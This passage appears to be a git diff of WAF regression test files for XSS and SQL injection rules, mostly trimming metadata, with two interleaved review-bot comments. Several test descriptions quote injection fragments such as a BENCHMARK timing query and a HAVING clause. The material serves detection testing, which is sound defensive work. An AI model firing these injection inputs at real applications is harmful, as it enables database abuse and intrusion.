+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Tests to trigger, or not trigger 941170" rule_id: 941170 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml index 198966a9c..a6a7c74f4 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml @@ -1,7 +1,6 @@ --- meta: author: "zmallen, azurit" - description: "Tests to trigger, or not trigger 941180" rule_id: 941180 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml index 7daab475b..ff7471614 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml @@ -1,7 +1,6 @@ --- meta: author: "Paul Beckett, azurit" - description: "Tests to trigger, or not trigger 941180" rule_id: 941181 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml index 4312b627b..d41e2d48b 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Tests to trigger, or not trigger 941190" rule_id: 941190 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml index 039398355..26ee42f8e 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml 
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml @@ -1,7 +1,6 @@ --- meta: author: "zmallen, azurit" - description: "Tests to trigger, or not trigger 941200" rule_id: 941200 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml index 7d98bc6eb..23cbfc407 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml @@ -1,7 +1,7 @@ --- meta: author: "zmallen, azurit" - description: "Tests to trigger, or not trigger 941210. This checks for abuses of javascript: with different encodings/html etc" + description: "This checks for abuses of javascript: with different encodings/html etc" rule_id: 941210 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml index 1fba86ff7..724283088 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "IE XSS Filters" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml index da266e23a..3778f0162 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "IE XSS Filters" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml index 78f92348d..9dbc15bcb 100644 
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "IE XSS Filters" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml index ff2d60e4e..176876cdf 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "IE XSS Filters" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml index ba6208417..bd09168ad 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "IE XSS Filters" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml index cb30bdd5a..b1239a7a0 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "IE XSS Filters" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml index 15c6eddfe..d1b0a149e 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml 
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "IE XSS Filters" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml index 073fa65ef..679fa5e6e 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "IE XSS Filters" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml index 78cd01227..f725188c4 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "XSS Attack - HTML Tag Handler" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml index aefc13977..a5509fd74 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "IE XSS Filters - Attack" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml index d5c5238c6..61dcf4817 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml 
@@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "IE XSS Filters - Attack" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml index 39834ce0d..97a14eb20 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml @@ -1,7 +1,6 @@ --- meta: author: "fgsch, azurit" - description: Test rule 941350 rule_id: 941350 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml index b09904023..ad7f1ed67 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian Folini, azurit" - description: None tests: - test_id: 1 desc: "JSFuck / Hieroglyphy payload obfuscation attack" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml index 36c8ee81b..91fb0cd18 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml @@ -1,7 +1,6 @@ --- meta: author: "Andrea Menin, azurit" - description: None tests: - test_id: 1 desc: "Bypass using comment in syntax and multiple whitespaces" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml index b5aa4b1c6..be8d0234b 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml 
@@ -1,7 +1,6 @@ --- meta: author: "Franziska Buehler, azurit" - description: None tests: - test_id: 1 desc: "AngularJS client side template injection detection" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml index 2db0965f6..61cd7bd18 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml @@ -1,7 +1,6 @@ --- meta: author: "Franziska Buehler, Xhoenix, azurit" - description: None tests: - test_id: 1 desc: "JavaScript method setInterval(code, 1)" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml index 0ded97033..ee9939f62 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml @@ -1,7 +1,6 @@ --- meta: author: "Andrea Menin, azurit" - description: None tests: - test_id: 1 desc: "JavaScript function without parentheses" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml index 2fbb65a60..8d126d024 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit" - description: None tests: - test_id: 1 - test_id: 1 diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml index ce94374b6..9c237d09a 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml 
@@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron and Allan Boll, Franziska Bühler, azurit" - description: None tests: - test_id: 1 desc: "SQL Injection Attack: SQL Tautology" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml index 03dad9402..ffb58f6d1 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, azurit" - description: None tests: - test_id: 1 desc: "SQL Injection Attack: Common DB Names Detected" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml index fb27be346..3b3cfe354 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit" - description: None tests: - test_id: 1 desc: "SQL Injection Attack: Common DB Names Detected" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml index 114ff39c9..6144f707b 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml @@ -1,7 +1,6 @@ --- meta: author: "Franziska Bühler, azurit" - description: None tests: - test_id: 1 desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: 'SELECT BENCHMARK(1000000,1+1);'" 
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml index 5969385cb..769080342 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "basic SQL authentication bypass" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml index e0bf51517..41ae47c46 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit" - description: None tests: - test_id: 1 desc: "MSSQL code execution and information gathering attempts" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml index 2ead47298..e8daad8cb 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - description: None tests: - test_id: 1 desc: "comment-/space-obfuscated injections and backtick termination" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942210.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942210.yaml index e319114a8..42a96fdb4 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942210.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942210.yaml 
@@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, azurit" - description: None +rule_id: 942210 tests: - test_id: 1 desc: "Detects chained SQL injection attempts" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml index 6f9b55bb2..c9fdd4047 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "Integer overflow taken from skipfish" @@ -14,7 +13,6 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 - # NB: not sure about rule 942220 uri: "/get?string_to_convert=4294967296" version: HTTP/1.0 output: diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml index d2960f380..f77654ff0 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - description: None tests: - test_id: 1 desc: "conditional SQL injection attempts" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml index 5dea6a808..19fcf99aa 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christoph Hansen, azurit" - description: None tests: - test_id: 1 desc: "Detects MySQL charset switch and MSSQL DoS attempts" 
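Review bot: In the 942220.yaml hunk at `@@ -14,7 +13,6 @@` the `# NB: not sure about rule 942220` comment is deleted while the request it doubted is untouched — `uri: "/get?string_to_convert=4294967296"` and the `output:` expectation below the hunk stay as they were — so the open question is hidden rather than answered. If the payload was confirmed to be what the rule is meant to catch, record that where the doubt stood, e.g. `# 4294967296 is 2^32, the boundary value the skipfish integer-overflow probe sends`; if it was not confirmed, the note should stay. The test block starts above the hunk and its `output:` section continues below it.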
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942250.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942250.yaml index 936ffdba4..02bad099f 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942250.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942250.yaml @@ -1,10 +1,10 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942250 tests: - test_id: 1 - desc: "MATCH AGAINST, MERGE and EXECUTE IMMEDIATE injection" + desc: "Find EXECUTE IMMEDIATE injection" stages: - input: dest_addr: 127.0.0.1 diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942251.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942251.yaml index fbeb2266f..1ac718e6f 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942251.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942251.yaml @@ -1,7 +1,7 @@ --- meta: author: "Franziska Bühler, azurit" - description: None +rule_id: 942251 tests: - test_id: 1 desc: "Detects having injections: ' HAVING COUNT(CustomerID) > 5'" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml index ae40a6316..82641f3a8 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, Christian Folini, azurit" - description: None +rule_id: 942260 tests: - test_id: 1 desc: "Basic SQL authentication bypass" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml index 29ca64a2d..0afc59e87 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml 
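Review bot: The new `desc: "Find EXECUTE IMMEDIATE injection"` for test 1 of 942250.yaml drops the MATCH AGAINST and MERGE cases the old description named, while nothing else about the test changes in the hunk; if the request (which continues past `dest_addr: 127.0.0.1` below the hunk) only sends an EXECUTE IMMEDIATE payload the new wording is the honest one, but then MATCH AGAINST and MERGE need their own tests if rule 942250 still targets them, which cannot be confirmed from this patch. If they are covered elsewhere in the file, a one-line comment above `desc:` such as `# MATCH AGAINST and MERGE are exercised by the tests below` would prevent a reader from concluding the coverage was lost. The `stages:` of this test continue past the end of the hunk.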
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942270 tests: - test_id: 1 desc: "basic sql injection. Common attack string for mysql, oracle and others" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml index ce9285872..07d1d74fb 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942280 tests: - test_id: 1 desc: "Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml index dff5dc4be..bac70548f 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml @@ -1,7 +1,7 @@ --- meta: author: "csanders-git, azurit" - description: None +rule_id: 942290 tests: - test_id: 1 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml index 3b9211975..4d19c2760 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - description: None +rule_id: 942300 tests: - test_id: 1 desc: "MySQL comments, conditions and ch(a)r injectionss" 
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml index 912eb148f..e198085a0 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942310 tests: - test_id: 1 desc: | diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml index 1aa3fec41..59c8ca3dd 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, azurit" - description: None +rule_id: 942320 tests: - test_id: 1 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml index a66288111..5a111a28a 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml @@ -1,6 +1,7 @@ --- meta: author: "Franziska Bühler, azurit" +rule_id: 942321 tests: - test_id: 1 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml index 064895736..5f3f31499 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml 
@@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942330 tests: - test_id: 1 desc: "classic SQL injection probings 1/3" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml index aaa462b99..88a871dbf 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942340 tests: - test_id: 1 desc: "basic SQL authentication bypass attempts 3/3" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml index 76b28ded2..7934f55fc 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - description: None +rule_id: 942350 tests: - test_id: 1 desc: "MySQL UDF injection and other data/structure manipulation" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml index 9b3df9409..3631ba1b1 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler, azurit" - description: None +rule_id: 942360 tests: - test_id: 1 desc: "concatenated basic SQL injection and SQLLFI" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml index 10d10a19a..259cc79ba 100644 
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christoph Hansen, azurit" - description: None +rule_id: 942361 tests: - test_id: 1 desc: "Detects basic SQL injection based on keyword alter or union" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml index fdc1d7fc3..27c6d2d09 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler, azurit" - description: None +rule_id: 942362 tests: - test_id: 1 desc: "concatenated basic SQL injection and SQLLFI" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml index 54279c427..18ba3f0fa 100644 --- 